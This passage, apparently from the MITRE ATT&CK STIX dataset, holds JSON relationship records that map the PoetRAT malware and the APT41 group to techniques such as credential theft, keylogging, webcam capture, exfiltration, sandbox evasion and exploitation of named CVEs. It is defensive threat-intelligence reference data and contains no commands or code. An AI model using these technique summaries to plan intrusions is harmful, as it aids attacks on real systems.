+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f3927864-d7dd-4bf3-8b2a-2a5445eb4004",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.822Z",
+ "created": "2020-04-28T12:47:25.822Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fac88cac-2935-4c68-af9f-c16fb93d6eac",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.828Z",
+ "created": "2020-04-28T12:47:25.827Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--52ad9918-ffba-4897-bbdc-261504094339",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.847Z",
+ "created": "2020-04-28T12:47:25.847Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b29f7b8-78fe-4bae-b943-59641a12a023",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.325Z",
+ "created": "2020-04-28T12:47:25.851Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9338b91-b07b-4ea1-9e2f-4fe06e58ce62",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.887Z",
+ "created": "2020-04-28T12:47:25.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the hive for persistence.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e7f60c3a-5b9e-4175-8bac-72773f580dad",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.920Z",
+ "created": "2020-04-28T12:47:25.920Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into command and control channels (C2) using [FTP](https://attack.mitre.org/software/S0095).(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3337112a-0b29-450f-9183-a0ec428c4898",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.149Z",
+ "created": "2020-04-28T12:47:25.938Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--47aebf09-4bee-4639-94e3-27b095d7558a",
+ "type": "relationship",
+ "modified": "2020-04-29T19:30:54.527Z",
+ "created": "2020-04-28T12:47:25.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6340a1e8-4880-4c91-b4fd-ce909b35b87f",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.083Z",
+ "created": "2020-04-28T12:47:25.941Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ab2602d5-a3f5-45d2-a522-9b4f87bc7a24",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.935Z",
+ "created": "2020-04-28T12:47:25.935Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3758634e-bb33-4354-98f3-b662e8e7e83f",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.954Z",
+ "created": "2020-04-28T12:47:25.954Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e159049f-70c1-4349-b299-c1d99d06901d",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.933Z",
+ "created": "2020-04-28T12:47:25.933Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f64733fd-acc7-4570-90ee-79c117c37d7e",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.446Z",
+ "created": "2020-04-28T12:47:25.946Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2606ed25-9f1d-4e85-822a-af39ce0d8e66",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.943Z",
+ "created": "2020-04-28T12:47:25.943Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d32fb833-c8ad-4d04-b998-3d62a6916966",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.098Z",
+ "created": "2020-04-28T12:47:25.948Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--77d954c5-de84-4f4b-98b6-5ad35603ae7a",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.992Z",
+ "created": "2020-04-28T12:47:25.992Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c46db015-9917-4c7b-8152-c6ad1394baf7",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.998Z",
+ "created": "2020-04-28T12:47:25.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.513Z",
+ "created": "2020-04-28T13:48:00.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.518Z",
+ "created": "2020-04-28T13:48:00.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f234930f-f7d1-458d-8c79-c73538990f97",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.720Z",
+ "created": "2020-04-28T13:48:00.522Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.681Z",
+ "created": "2020-04-28T13:48:00.555Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e",
+ "type": "relationship",
+ "modified": "2020-04-30T20:31:38.908Z",
+ "created": "2020-04-28T13:48:00.652Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [FTP](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.660Z",
+ "created": "2020-04-28T13:48:00.660Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fc86f198-f9d7-4b95-b26a-9cb9b922f2f1",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.924Z",
+ "created": "2020-04-28T13:48:00.924Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--250d9854-4da5-4977-93ed-feff1cd39e3d",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.931Z",
+ "created": "2020-04-28T13:48:00.931Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9cdb5a1a-a68f-4ee2-a807-ba4c0ae8e436",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.947Z",
+ "created": "2020-04-28T13:48:00.947Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--29686ce0-db1e-4d77-a21c-7b1e97ee51ac",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.271Z",
+ "created": "2020-04-28T14:37:51.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--64764dc6-a032-495f-8250-1e4c06bdc163",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
